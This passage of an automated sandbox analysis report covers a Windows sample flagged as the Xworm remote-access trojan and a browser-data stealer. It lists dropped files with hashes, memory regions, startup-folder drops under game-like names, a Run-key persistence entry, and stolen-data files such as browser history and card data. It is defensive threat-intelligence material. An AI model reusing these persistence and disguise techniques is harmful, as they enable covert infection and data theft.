SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

memory/4544-146-0x00007FFE6A580000-0x00007FFE6AC59000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_ctypes.pyd

MD5 76288ffffdce92111c79636f71b9bc9d
SHA1 15c10dcd31dab89522bf5b790e912dc7e6b3183b
SHA256 192cc2ac818c78cd21e9f969a95c0ff777d4cd5f79ae51ab7c366d2b8540f6a1
SHA512 29efc143cd72bf886e9bf54463706484f22222f024bd7e8cb206c32f40b76d823efd36061b05bbd6bcf562f83d95449acb3f1440c95e63750c643c15a10816c9

C:\Users\Admin\AppData\Local\Temp\_MEI35042\python3.DLL

MD5 6271a2fe61978ca93e60588b6b63deb2
SHA1 be26455750789083865fe91e2b7a1ba1b457efb8
SHA256 a59487ea2c8723277f4579067248836b216a801c2152efb19afee4ac9785d6fb
SHA512 8c32bcb500a94ff47f5ef476ae65d3b677938ebee26e80350f28604aaee20b044a5d55442e94a11ccd9962f34d22610b932ac9d328197cf4d2ffbc7df640efba

C:\Users\Admin\AppData\Local\Temp\_MEI35042\base_library.zip

MD5 630153ac2b37b16b8c5b0dbb69a3b9d6
SHA1 f901cd701fe081489b45d18157b4a15c83943d9d
SHA256 ec4e6b8e9f6f1f4b525af72d3a6827807c7a81978cb03db5767028ebea283be2
SHA512 7e3a434c8df80d32e66036d831cbd6661641c0898bd0838a07038b460261bf25b72a626def06d0faa692caf64412ca699b1fa7a848fe9d969756e097cba39e41

memory/4544-154-0x00007FFE7EAD0000-0x00007FFE7EAF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_bz2.pyd

MD5 f991618bfd497e87441d2628c39ea413
SHA1 98819134d64f44f83a18985c2ec1e9ee8b949290
SHA256 333c06fad79094d43465d128d68078296c925d1ea2b6b5bf13072a8d5cb65e7e
SHA512 3a9ecb293abedcdba3493feb7d19f987735ced5a5194abaa1d1e00946e7ea0f878dd71868eb3d9bfec80432df862367661b825c9e71409c60ec73d1708a63ef6

memory/4544-160-0x00007FFE7E710000-0x00007FFE7E729000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_lzma.pyd

MD5 f07f0cfe4bc118aebcde63740635a565
SHA1 44ee88102830434bb9245934d6d4456c77c7b649
SHA256 cc5302895aa164d5667d0df3ebeeee804384889b01d38182b3f7179f3c4ff8c0
SHA512 fcd701903ccd454a661c27835b53f738d947f38e9d67620f52f12781a293e42ae6b96c260600396883d95dd5f536dba2874aaee083adbcc78d66873cefc8e99d

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_wmi.pyd

MD5 f3767430bbc7664d719e864759b806e4
SHA1 f27d26e99141f15776177756de303e83422f7d07
SHA256 787caad25cb4e2df023ead5e5a3fcd160b1c59a2e4ae1fc7b25c5087964defe8
SHA512 b587dfff4ba86142663de6ef8710ac7ab8831ca5fc989820b6a197bcd31ac5fdcb0b5982bf9a1fc13b331d0e53dc1b7367b54bb47910f3d1e18f8193449acb9c

memory/4544-181-0x00007FFE75180000-0x00007FFE751AD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_uuid.pyd

MD5 7a00ff38d376abaaa1394a4080a6305b
SHA1 d43a9e3aa3114e7fc85c851c9791e839b3a0ee13
SHA256 720e9b68c41c8d9157865e4dd243fb1731f627f3af29c43250804a5995a82016
SHA512 ce39452df539eeeff390f260c062a0c902557fda25a7be9a58274675b82b30bddb7737b242e525f7d501db286f4873b901d94e1cd09aa8864f052594f4b34789

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_ssl.pyd

MD5 8696f07039706f2e444f83bb05a65659
SHA1 6c6fff6770a757e7c4b22e6e22982317727bf65b
SHA256 5405af77bc6ad0c598490b666c599c625195f7bf2a63db83632e3a416c73e371
SHA512 93e9f8fc1ae8a458eb4d9e7d7294b5c2230cb753386842e72d07cb7f43f248d204d13d93aedae95ec1a7aa6a81a7c09fdba56a0bc31924a1722c423473d97758

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_socket.pyd

MD5 7e92d1817e81cbafdbe29f8bec91a271
SHA1 08868b9895196f194b2e054c04edccf1a4b69524
SHA256 19573ccc379190277674a013f35bf055f6dbb57adfce79152152a0de3ff8c87c
SHA512 0ed41a3ce83b8f4a492555a41881d292ece61d544f0a4df282f3cc37822255a7a32647724568c9a3b04d13fd3cc93eb080e54ac2ce7705b6b470454366be1cbe

C:\Users\Admin\AppData\Local\Temp\_MEI35042\select.pyd

MD5 c16b7b88792826c2238d3cf28ce773dd
SHA1 198b5d424a66c85e2c07e531242c52619d932afa
SHA256 b81be8cc053734f317ff4de3476dd8c383cc65fe3f2f1e193a20181f9ead3747
SHA512 7b1b2494fe0ef71869072d3c41ba1f2b67e3b9dcc36603d1503bb914d8b8e803dc1b66a3cbf0e45c43e4a5b7a8f44504a35d5e8e1090d857b28b7eba1b89c08a

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_sqlite3.pyd

MD5 29a6551e9b7735a4cb4a61c86f4eb66c
SHA1 f552a610d64a181b675c70c3b730aa746e1612d0
SHA256 78c29a6479a0a2741920937d13d404e0c69d21f6bd76bdfec5d415857391b517
SHA512 54a322bfe5e34f0b6b713e22df312cfbde4a2b52240a920b2fa3347939cf2a1fecbeac44d7c1fa2355ee6dc714891acd3ee827d73131fd1e39fba390c3a444e6

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_queue.pyd

MD5 8347192a8c190895ec8806a3291e70d9
SHA1 0a634f4bd15b7ce719d91f0c1332e621f90d3f83
SHA256 b1ad27547e8f7ab2d1ce829ca9bdcc2b332dc5c2ef4fe224ccb76c78821c7a19
SHA512 de6858ed68982844c405ca8aecf5a0aa62127807b783a154ba5d844b44f0f8f42828dc097ac4d0d1aa8366cdcab44b314effcb0020b65db4657df83b1b8f5fed

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_overlapped.pyd

MD5 ed9cff0d68ba23aad53c3a5791668e8d
SHA1 a38c9886d0de7224e36516467803c66a2e71c7d9
SHA256 e88452d26499f51d48fe4b6bd95fc782bad809f0cb009d249aacf688b9a4e43f
SHA512 6020f886702d9ff6530b1f0dad548db6ad34171a1eb677cb1ba14d9a8943664934d0cfe68b642b1dd942a70e3ae375071591a66b709c90bd8a13303a54d2198b

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_multiprocessing.pyd

MD5 0c942dacb385235a97e373bdbe8a1a5e
SHA1 cf864c004d710525f2cf1bec9c19ddf28984ca72
SHA256 d5161d4e260b2bb498f917307f1c21381d738833efc6e8008f2ebfb9447c583b
SHA512 ca10c6842634cec3cada209b61dd5b60d8ea63722e3a77aa05e8c61f64b1564febe9612b554a469927dbce877b6c29c357b099e81fa7e73ceeae04b8998aa5a5

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_hashlib.pyd

MD5 caaea46ee25211cbdc762feb95dc1e4d
SHA1 1f900cc99c02f4300d65628c1b22ddf8f39a94d4
SHA256 3ef6e0e5bf3f1ea9713f534c496a96eded9d3394a64324b046a61222dab5073b
SHA512 68c2b1634fcca930c1651f550494a2ef187cf52dce8ff28f410ebed4d84487e3b08f6f70223a83b5313c564dcd293748f3c22f2a4218218e634e924c8390cf9a

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_decimal.pyd

MD5 c2f5d61323fb7d08f90231300658c299
SHA1 a6b15204980e28fc660b5a23194348e6aded83fc
SHA256 a8ea1e613149d04e7ce637413aad6df636556916902718f64e57fdff44f959bb
SHA512 df22676b5268175562574078459820f11eedb06f2845c86398c54861e9e3fb92547e7341b497fb0e79e9d3abba655e6593b1049bf78818c0ba7b9c96e3748606

memory/4544-189-0x00007FFE7E780000-0x00007FFE7E78D000-memory.dmp

memory/4544-188-0x00007FFE7EA30000-0x00007FFE7EA3D000-memory.dmp

memory/4544-187-0x00007FFE75710000-0x00007FFE75729000-memory.dmp

memory/4544-186-0x00007FFE7EAB0000-0x00007FFE7EABD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_cffi_backend.cp312-win_amd64.pyd

MD5 886da52cb1d06bd17acbd5c29355a3f5
SHA1 45dee87aefb1300ec51f612c3b2a204874be6f28
SHA256 770d04ebe9f4d8271659ba9bf186b8ae422fdd76f7293dbc84be78d9d6dd92cc
SHA512 d6c7a90b8fa017f72f499943d73e4015f2eec0e46188c27848892a99be35e0ecbda1f692630863b89109b04636e813ddad2051f323a24b4d373192a6b67cf978

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_asyncio.pyd

MD5 b72e9a2f4d4389175e96cd4086b27aac
SHA1 2acfa17bb063ee9cf36fadbac802e95551d70d85
SHA256 f9924bbead1aca98422ba421f5139a4c147559aae5928dfd2f6aada20cb6bb42
SHA512 b55f40451fa9bdd62c761823613fcfe734aaa28e26fb02a9620ad39ab7539c9257eac8cc10d4a3f2390c23a4d951cc02d695498530a4c1d91b4e51e625316e06

C:\Users\Admin\AppData\Local\Temp\_MEI35042\VCRUNTIME140_1.dll

MD5 f8dfa78045620cf8a732e67d1b1eb53d
SHA1 ff9a604d8c99405bfdbbf4295825d3fcbc792704
SHA256 a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5
SHA512 ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

C:\Users\Admin\AppData\Local\Temp\_MEI35042\unicodedata.pyd

MD5 4253cde4d54e752ae54ff45217361471
SHA1 06aa069c348b10158d2412f473c243b24d6fc7bc
SHA256 67634e2df60da6b457e4ebfbae3edb1f48d87752221600a5814b5e8f351166e6
SHA512 3b714a57747eddf39fc3a84ab3ca37cc0b8103dd3f987331ffb2d1d46f9a34f3793bb0493c55e02ab873314c8990eaebdd0284ad087a651c06a7f862b1a61c80

C:\Users\Admin\AppData\Local\Temp\_MEI35042\sqlite3.dll

MD5 8776a7f72e38d2ee7693c61009835b0c
SHA1 677a127c04ef890e372d70adc2ab388134753d41
SHA256 c467fcc7377b4a176e8963f54ffff5c96d1eb86d95c4df839af070d6d7dbf954
SHA512 815bf905fa9a66c05e5c92506d2661c87559c6205c71daa205368dbfd3d56b8a302a4d31729bc6d4c1d86cbcf057638aa17bde0d85ccc59ce1cbcb9e64349732

C:\Users\Admin\AppData\Local\Temp\_MEI35042\pyexpat.pyd

MD5 edcb8f65306461e42065ac6fc3bae5e7
SHA1 4faa04375c3d2c2203be831995403e977f1141eb
SHA256 1299da117c98d741e31c8fb117b0f65ae039a4122934a93d0bbb8dfbddd2dcd7
SHA512 221e6e1eb9065f54a48040b48f7b6109853306f04506ccf9ecb2f5813a5bd9675c38565a59e72770bf33d132977aa1558cc290720e39a4f3a74a0e7c2a3f88fa

C:\Users\Admin\AppData\Local\Temp\_MEI35042\libssl-3.dll

MD5 9b8d3341e1866178f8cecf3d5a416ac8
SHA1 8f2725b78795237568905f1a9cd763a001826e86
SHA256 85dd8c17928e78c20cf915c1985659fe99088239793f2bd46acb31a3c344c559
SHA512 815abc0517f94982fc402480bba6e0749f44150765e7f8975e4fcbfce62c4a5ff741e39e462d66b64ba3b804bd5b7190b67fff037d11bb314c7d581cfa6097a8

C:\Users\Admin\AppData\Local\Temp\_MEI35042\libcrypto-3.dll

MD5 e68a459f00b05b0bd7eafe3da4744aa9
SHA1 41565d2cc2daedd148eeae0c57acd385a6a74254
SHA256 3fcf6956df6f5dc92b2519062b40475b94786184388540a0353f8a0868413648
SHA512 6c4f3747af7be340a3db91e906b949684a39cafc07f42b9fcc27116f4f4bf405583fc0db3684312b277d000d8e6a566db2c43601fa2af499700319c660ef1108

memory/4544-157-0x00007FFE7EAC0000-0x00007FFE7EACF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI35042\libffi-8.dll

MD5 bb1feaa818eba7757ada3d06f5c57557
SHA1 f2de5f06dc6884166de165d34ef2b029bb0acf8b
SHA256 a7ac89b42d203ad40bad636ad610cf9f6da02128e5a20b8b4420530a35a4fb29
SHA512 95dd1f0c482b0b0190e561bc08fe58db39fd8bb879a2dec0cabd40d78773161eb76441a9b1230399e3add602685d0617c092fff8bf0ab6903b537a9382782a97

memory/4544-191-0x00007FFE699C0000-0x00007FFE699F3000-memory.dmp

memory/4544-193-0x00007FFE69E20000-0x00007FFE69EED000-memory.dmp

memory/4544-196-0x00007FFE69490000-0x00007FFE699B9000-memory.dmp

memory/4544-197-0x0000024081080000-0x00000240815A9000-memory.dmp

memory/3844-208-0x0000021D455C0000-0x0000021D455E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l5e1xcgp.qnd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4992-211-0x00007FFE6DE90000-0x00007FFE6E951000-memory.dmp

memory/4544-214-0x00007FFE69A20000-0x00007FFE69A32000-memory.dmp

memory/4544-218-0x00007FFE7EAD0000-0x00007FFE7EAF5000-memory.dmp

memory/4544-217-0x00007FFE68CC0000-0x00007FFE68CE4000-memory.dmp

memory/4544-220-0x00007FFE67FB0000-0x00007FFE68126000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI35042\psutil\_psutil_windows.pyd

MD5 d2ab09582b4c649abf814cdce5d34701
SHA1 b7a3ebd6ff94710cf527baf0bb920b42d4055649
SHA256 571115cca942bc76010b379df5d28afcb0f0d0de65a3bac89a95c6a86838b983
SHA512 022ccaeb99dc08997d917f85c6bc3aefdad5074c995008942a2f35f46ba07d73bb5bc7bc971ec71cb0e60dcb096b2c990866fe29c57670d069e7bdc3b14f6172

memory/4544-223-0x00007FFE69A00000-0x00007FFE69A18000-memory.dmp

memory/4544-225-0x00007FFE68B60000-0x00007FFE68B74000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI35042\charset_normalizer\md.cp312-win_amd64.pyd

MD5 21898e2e770cb9b71dc5973dd0d0ede0
SHA1 99de75d743f6e658a1bec52419230690b3e84677
SHA256 edd490bec8ec903cdbf62f39e0675181e50b7f1df4dc48a3e650e18d19804138
SHA512 dc8636d817ae1199200c24ac22def5d12642db951b87f4826015fd1d5c428d45410ce3b7f5bb5aaaa05deecf91d954b948f537bd6fa52a53364ab3609caac81d

C:\Users\Admin\AppData\Local\Temp\_MEI35042\charset_normalizer\md__mypyc.cp312-win_amd64.pyd

MD5 4e5cd67d83f5226410ef9f5bc6fddab9
SHA1 dd75f79986808ff22f1049680f848a547ba7ab84
SHA256 80645609f9a48a8aaf988fa667f5aa32445e32f8027f61b27884d738ad608ae4
SHA512 e52eb7b51562a336c73c6b5b8a1ae821a7c2ad0145633858fc78d6af1a27d8f57ba59cfffa84a376f59d5362a19a7cc09fa1f691c7b50b3ac27c439781a42ba0

memory/4544-232-0x00007FFE6A4E0000-0x00007FFE6A507000-memory.dmp

memory/4544-235-0x00007FFE68260000-0x00007FFE6837B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI35042\Cryptodome\Cipher\_raw_ecb.pyd

MD5 1a48e6e2a3243a0e38996e61f9f61a68
SHA1 488a1aa38cd3c068bdf24b96234a12232007616c
SHA256 c7b01a0290bc43910ee776bd90de05e37b77f5bd33feaf7d38f4c362e255e061
SHA512 d7acd779b7cab5577289511f137dc664966fcaac39748e33ca4d266a785b17766106944df21c8f2452fd28e008529f3e0097282ad3c69f1069a93df25c6da764

C:\Users\Admin\AppData\Local\Temp\_MEI35042\Cryptodome\Cipher\_raw_cbc.pyd

MD5 e0dd54d1a4a8b3f4a2b7fb67bc2e6297
SHA1 b184c2ed3dd46d527df992ffe0c57ef8eb364eea
SHA256 b6b7cce003744af2342afef0f2536cdbbccd3a271f15f72aefc740332312281e
SHA512 960f3e6e3a6168ba65d690cb9c94541de8f5a8afb456b5db8d7c0392d0d935cf47245eb88160606be12d54c32f1dc1e1ebf7c6049a310654847e0d473d1726a6

memory/4544-234-0x00007FFE699C0000-0x00007FFE699F3000-memory.dmp

memory/4544-231-0x00007FFE7F4E0000-0x00007FFE7F4EB000-memory.dmp

memory/4544-230-0x00007FFE7EAB0000-0x00007FFE7EABD000-memory.dmp

memory/4544-216-0x00007FFE6A580000-0x00007FFE6AC59000-memory.dmp

memory/4544-249-0x00007FFE6A1B0000-0x00007FFE6A1BC000-memory.dmp

memory/4544-256-0x00007FFE6A150000-0x00007FFE6A15C000-memory.dmp

memory/4544-255-0x00007FFE68B40000-0x00007FFE68B52000-memory.dmp

memory/4544-254-0x00007FFE6A160000-0x00007FFE6A16D000-memory.dmp

memory/4544-253-0x00007FFE6A170000-0x00007FFE6A17C000-memory.dmp

memory/4544-252-0x00007FFE6A180000-0x00007FFE6A18C000-memory.dmp

memory/4544-263-0x00007FFE7EAD0000-0x00007FFE7EAF5000-memory.dmp

memory/4544-282-0x00007FFE6A4E0000-0x00007FFE6A507000-memory.dmp

memory/4544-278-0x00007FFE67FB0000-0x00007FFE68126000-memory.dmp

memory/4544-277-0x00007FFE68CC0000-0x00007FFE68CE4000-memory.dmp

memory/4544-296-0x0000024081080000-0x00000240815A9000-memory.dmp

memory/4544-273-0x00007FFE69490000-0x00007FFE699B9000-memory.dmp

memory/4544-299-0x00007FFE684B0000-0x00007FFE684DE000-memory.dmp

memory/4544-298-0x00007FFE684E0000-0x00007FFE68509000-memory.dmp

memory/4544-297-0x00007FFE65170000-0x00007FFE653F3000-memory.dmp

memory/4544-279-0x00007FFE69A00000-0x00007FFE69A18000-memory.dmp

memory/4544-262-0x00007FFE6A580000-0x00007FFE6AC59000-memory.dmp

memory/4544-251-0x00007FFE6A190000-0x00007FFE6A19B000-memory.dmp

memory/4544-250-0x00007FFE6A1A0000-0x00007FFE6A1AB000-memory.dmp

memory/4544-248-0x00007FFE6A1C0000-0x00007FFE6A1CE000-memory.dmp

memory/4544-247-0x00007FFE6A1D0000-0x00007FFE6A1DC000-memory.dmp

memory/4544-246-0x00007FFE6A1E0000-0x00007FFE6A1EC000-memory.dmp

memory/4544-245-0x00007FFE6A1F0000-0x00007FFE6A1FB000-memory.dmp

memory/4544-244-0x00007FFE6A200000-0x00007FFE6A20C000-memory.dmp

memory/4544-243-0x00007FFE6A4C0000-0x00007FFE6A4CB000-memory.dmp

memory/4544-242-0x00007FFE6A4D0000-0x00007FFE6A4DC000-memory.dmp

memory/4544-241-0x00007FFE700D0000-0x00007FFE700DB000-memory.dmp

memory/4544-240-0x00007FFE7F4D0000-0x00007FFE7F4DB000-memory.dmp

memory/4544-239-0x00007FFE69E20000-0x00007FFE69EED000-memory.dmp

memory/4544-213-0x00007FFE68D50000-0x00007FFE68D85000-memory.dmp

memory/4544-212-0x00007FFE69A80000-0x00007FFE69A96000-memory.dmp

memory/4544-406-0x00007FFE67FB0000-0x00007FFE68126000-memory.dmp

memory/4544-407-0x00007FFE69A00000-0x00007FFE69A18000-memory.dmp

memory/4544-400-0x00007FFE69E20000-0x00007FFE69EED000-memory.dmp

memory/4544-399-0x00007FFE699C0000-0x00007FFE699F3000-memory.dmp

memory/4544-401-0x00007FFE69490000-0x00007FFE699B9000-memory.dmp

memory/4992-427-0x000000001AE20000-0x000000001AE30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FzzW7EsRxv\Browser\history.txt

MD5 5638715e9aaa8d3f45999ec395e18e77
SHA1 4e3dc4a1123edddf06d92575a033b42a662fe4ad
SHA256 4db7f6559c454d34d9c2d557524603c3f52649c2d69b26b6e8384a3d179aeae6
SHA512 78c96efab1d941e34d3137eae32cef041e2db5b0ebbf883e6a2effa79a323f66e00cfb7c45eb3398b3cbd0469a2be513c3ff63e5622261857eefc1685f77f76b

C:\Users\Admin\AppData\Local\Temp\FzzW7EsRxv\Browser\cc's.txt

MD5 5aa796b6950a92a226cc5c98ed1c47e8
SHA1 6706a4082fc2c141272122f1ca424a446506c44d
SHA256 c4c83da3a904a4e7114f9bd46790db502cdd04800e684accb991cd1a08ee151c
SHA512 976f403257671e8f652bf988f4047202e1a0fd368fdb2bab2e79ece1c20c7eb775c4b3a8853c223d4f750f4192cd09455ff024918276dc1dd1442fa3b36623ad

memory/4544-474-0x00007FFE7FA20000-0x00007FFE7FA2F000-memory.dmp

memory/4544-514-0x00007FFE7EAC0000-0x00007FFE7EACF000-memory.dmp

memory/4544-519-0x00007FFE7EA30000-0x00007FFE7EA3D000-memory.dmp

memory/4544-522-0x00007FFE69E20000-0x00007FFE69EED000-memory.dmp

memory/4544-521-0x00007FFE699C0000-0x00007FFE699F3000-memory.dmp

memory/4544-520-0x00007FFE7E780000-0x00007FFE7E78D000-memory.dmp

memory/4544-518-0x00007FFE75710000-0x00007FFE75729000-memory.dmp

memory/4544-517-0x00007FFE7EAB0000-0x00007FFE7EABD000-memory.dmp

memory/4544-523-0x00007FFE69490000-0x00007FFE699B9000-memory.dmp

memory/4544-525-0x00007FFE68D50000-0x00007FFE68D85000-memory.dmp

memory/4544-548-0x00007FFE68B40000-0x00007FFE68B52000-memory.dmp

memory/4544-547-0x00007FFE6A160000-0x00007FFE6A16D000-memory.dmp

memory/4544-546-0x00007FFE6A170000-0x00007FFE6A17C000-memory.dmp

memory/4544-545-0x00007FFE6A180000-0x00007FFE6A18C000-memory.dmp

memory/4544-544-0x00007FFE6A190000-0x00007FFE6A19B000-memory.dmp

memory/4544-543-0x00007FFE6A1A0000-0x00007FFE6A1AB000-memory.dmp

memory/4544-542-0x00007FFE6A1B0000-0x00007FFE6A1BC000-memory.dmp

memory/4544-541-0x00007FFE6A1C0000-0x00007FFE6A1CE000-memory.dmp

memory/4544-540-0x00007FFE6A1D0000-0x00007FFE6A1DC000-memory.dmp

memory/4544-539-0x00007FFE6A1E0000-0x00007FFE6A1EC000-memory.dmp

memory/4544-538-0x00007FFE6A1F0000-0x00007FFE6A1FB000-memory.dmp

memory/4544-537-0x00007FFE6A200000-0x00007FFE6A20C000-memory.dmp

memory/4544-536-0x00007FFE6A4C0000-0x00007FFE6A4CB000-memory.dmp

memory/4544-535-0x00007FFE6A4D0000-0x00007FFE6A4DC000-memory.dmp

memory/4544-534-0x00007FFE700D0000-0x00007FFE700DB000-memory.dmp

memory/4544-533-0x00007FFE7F4D0000-0x00007FFE7F4DB000-memory.dmp

memory/4544-532-0x00007FFE68260000-0x00007FFE6837B000-memory.dmp

memory/4544-531-0x00007FFE6A4E0000-0x00007FFE6A507000-memory.dmp

memory/4544-530-0x00007FFE7F4E0000-0x00007FFE7F4EB000-memory.dmp

memory/4544-529-0x00007FFE68B60000-0x00007FFE68B74000-memory.dmp

memory/4544-528-0x00007FFE69A00000-0x00007FFE69A18000-memory.dmp

memory/4544-527-0x00007FFE67FB0000-0x00007FFE68126000-memory.dmp

memory/4544-526-0x00007FFE6A580000-0x00007FFE6AC59000-memory.dmp

memory/4544-524-0x00007FFE69A80000-0x00007FFE69A96000-memory.dmp

memory/4544-516-0x00007FFE75180000-0x00007FFE751AD000-memory.dmp

memory/4544-515-0x00007FFE7E710000-0x00007FFE7E729000-memory.dmp

memory/4544-513-0x00007FFE7EAD0000-0x00007FFE7EAF5000-memory.dmp

memory/4544-512-0x00007FFE68CC0000-0x00007FFE68CE4000-memory.dmp

memory/4544-511-0x00007FFE69A20000-0x00007FFE69A32000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-29 13:18

Reported

2024-04-29 13:20

Platform

win11-20240419-en

Max time kernel

57s

Max time network

53s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Output.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SoundPad.exe C:\Users\Admin\SoundPad.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gorillatag client.lnk C:\Users\Admin\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gorillatag client.lnk C:\Users\Admin\XClient.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\XClient.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\Gorillatag client.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000\Software\Microsoft\Windows\CurrentVersion\Run\Gorillatag client = "C:\\Users\\Admin\\Gorillatag client.exe" C:\Users\Admin\XClient.exe N/A

